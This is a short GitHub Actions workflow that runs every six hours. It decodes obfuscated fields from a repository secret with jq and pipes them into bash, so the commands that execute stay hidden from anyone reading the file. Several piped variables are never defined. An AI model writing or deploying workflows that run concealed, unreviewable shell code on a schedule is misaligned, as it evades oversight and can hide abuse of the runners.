name: luanlinwanyu
on:
  workflow_dispatch:
  schedule:
    - cron: '7 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luanlinwanyu
        env:
          mbew5572: ${{ secrets.mbew5572 }}
        run: |
          echo $mbew5572 | jq -r .e4 | /bin/bash
          echo $sxday50890 | jq -r .vejeq1 | /bin/bash
          echo $bjro960 | jq -r .iyxr7750 | /bin/bash
          echo $zbhu9016 | jq -r .rvk61 | /bin/bash
          echo $lkuzo705 | jq -r .icxtf9 | /bin/bash
          echo $vxgp9 | jq -r .cnt8 | /bin/bash

